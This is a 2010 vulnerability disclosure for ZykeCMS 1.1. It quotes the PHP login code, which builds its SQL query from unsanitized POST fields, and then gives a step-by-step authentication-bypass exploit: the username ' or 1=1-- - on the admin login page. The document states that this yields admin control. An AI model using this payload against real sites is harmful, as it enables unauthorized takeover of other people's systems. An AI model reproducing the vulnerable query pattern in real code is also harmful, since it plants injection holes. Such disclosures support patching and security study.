======================================================
ZykeCMS V1.1 (Auth Bypass) SQL Injection Vulnerability
======================================================
Author : Giuseppe 'giudinvx' D'Inverno
Email : <giudinvx[at]gmail[dot]com>
Date : 04-16-2010
Site : http://www.giudinvx.altervista.org/
Location : Naples, Italy
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Application Info:
Site : http://www.zykecms.com/
Version: 1.1
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
[·] Vulnerable code in /zykecms/conf/functions.php | /zykecms/admin.php
<?php
// admin.php
··········
if ($_POST['login'] != "" and $_POST['password'] != "")
{
if (check_login($_POST['login'], $_POST['password']) == true)
{
if ($_SESSION['function'] == 1)
header('Location: admin/');
else
header('Location: ');
$error_login = "";
}
else
··········
//functions.php
··········
function check_login($login, $password)
{
$sql = "SELECT * FROM users WHERE login='".$login."' AND
password='".md5($password)."'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
$data = mysql_fetch_array($result);
// echo $sql;
if ($num == 1)
{
session_start();
$_SESSION['last_access']=time();
$_SESSION['function']=$data['function'];
$_SESSION['login']=$data['login'];
$_SESSION['firstname']=$data['firstname'];
$_SESSION['lastname']=$data['lastname'];
$_SESSION['date']=$data['date'];
$_SESSION['id']=$data['id'];
return true;
}
else
return false;
}
·········
?>
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
[·] Exploit
Frist of all join login page:
http://[target]/[path]/admin.php
Username: ' or 1=1-- -
Password: 1
Now have admin control.